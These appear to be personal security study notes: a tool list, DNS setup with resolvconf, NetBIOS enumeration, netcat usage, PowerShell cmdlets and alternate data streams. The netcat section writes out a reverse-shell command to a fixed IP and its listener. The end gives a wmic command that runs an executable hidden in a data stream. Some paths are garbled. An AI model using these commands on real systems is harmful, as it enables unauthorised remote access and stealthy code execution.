• LinkedIn

    • Scanning and Reconnaissance
      • nmap
    • Sniffing
      • Wireshark
    • SQL Injection
      • Sqlmap
    • Brute-forcing or Password Cracking
      • Hydra
      • John The Ripper
    • Cryptography
      • Md5sum
      • Veracrypt
    • Steganography
      • Open Stego

  • resolvconf

    • To customize access point to poin to custom name servers like cloudflare On system/hosts
    • Installation
      • apt install resolvconf
    • systemctl enable resolvconf.service
      • To enable the service, so that it runs on startup
    • start resolvconf.service
      • To use it right now
    • status resolvconf.service
      • To check if it is loaded and running
    • cat /etc/resolv.conf
      • To check that who is managing it
    • vim /etc/resolvconf/resolv.conf.d/base
      • To put custom name servers
        • nameserver 1.1.1.1
          • Cloudflare
        • nameserver 8.8.8.8
          • Google (Not Recommended)
        • nameserver 8.8.4.4.
          • Google (Not Recommended)
    • systemctl restart resolvconf.service
      • To start this service
    • systemctl restart NetworkManager
      • To make sure that the changes has been logged
    • If the above doesn’t work
      • vim /etc/network/interfaces
        • To manually configure DNS name servers
      • dns-nameservers 1.1.1.1 8.8.8.8 8.8.4.4
        • Add in the bottom
      • systemctl restart resolvconf.service
      • systemctl restart NetworkManager
      • cat /etc/resolv.conf
      • If still notworking
        • sudo reboot -f

  • NetBIOS

    • Network Basic Input/Output System (137) allows communication between computer on a local network.
    • Works on before Windows 7 & servers only.
      • It does work with the newer version also but does not provides much of information.
    • Why we need NetBIOS Enumeration?
      • Group that computer belongs to and the share (Files shared in network) and the computer name.
      • Nothing special just how network is configured or how computers are configured on the network.
    • nbtstat -A 192.168.1.108
      • nbtstat -r 192.168.1.0/24
        • r : To scan a range of IP
      • nbtstat -v -r 192.168.1.103
        • v : Verbose

  • netcat “It allows users to connect to specific ports and send and receive data. It also allows machines to receive data and connections on specific ports, which makes nc a very popular tool to gain a Reverse Shell.”

    • Switches “nc netcat -l listen for an incoming connection rather than initiate a connection to a remote host. -v To see who connected to you -n Do not do any DNS or service lookups on any specified addresses, hostnames or ports. -p Specifies the source port nc should use, subject to privilege restrictions and availability. -u To connect to UDP port -e To specify which program to execute after you connect to a host”

    • To connect back to our attacking machine (Victim Machine) “nc 161.35.162.57 4444 -e /bin/sh”

    • To listen for connection ( Attacker machine) “nc -lvnp 4444 or nc -l -v -n -p 4444”

    • netcatnetcat

    • “echo hello | nc

      1234 to send the string hello to the service running on port 1234”

  • PowerShell

    • To change directories “Set-Location -Path c:”

    • To list the contents of the current directory "Get-ChildItem -File -ErrorAction SilentlyContinue Looking for a hidden directory with the recursion filter Get-ChildItem -Directory -Hidden -Recurse -Filter ‘3’ -ErrorAction SilentlyContinue "

      There are various other options we can use with this cmdlet to enhance its capabilities further.

      • Path Specifies a path to one or more locations. Wildcards are accepted. -File / -Directory To get a list of files, use the File parameter. To get a list of directories, use the Directory parameter. You can use the Recurse parameter with File and/or Directory parameters. -Filter Specifies a filter to qualify the Path parameter. -Recurse Gets the items in the specified locations and in all child items of the locations. -Hidden To get only hidden items, use the Hidden parameter. -ErrorAction SilentlyContinue Specifies what action to take if the command encounters an error.

    • To read the contents of a file “Get-Content -Path file.txt”

      • To get the number of words contained within a file “Get-Content -Path file.txt | Measure-Object -Word”
      • To get the exact position of a string within the file “(Get-Content -Path file.txt)[index] The index is the numerical value that is the location of the string within the file. Since indexes start at zero, you typically need to subtract one from the original value to extract the string at the correct position. ”

    • To search a particular file for a pattern we define "Select-String -Path ‘c:’ -Pattern ’*.pdf’"

    • To obtain more information about a specific cmdlet “Get-Help Select-String”

    • To obtain the hash of a file “Get-FileHash -Algorithm MD5 file.txt”

    • To locate the different streams "Get-Item -Path c:.exe -Stream * "

  • Strings tool to scan the mysterious executable “c:64.exe -accepteula file.exe Strings scans the file you pass it for strings of a default length of 3 or more characters. You can use the Strings tool to peek inside this mysterious executable file.”

  • To launch the hidden executable hiding within ADS “wmic process call create $(Resolve-Path file.exe:streamname)”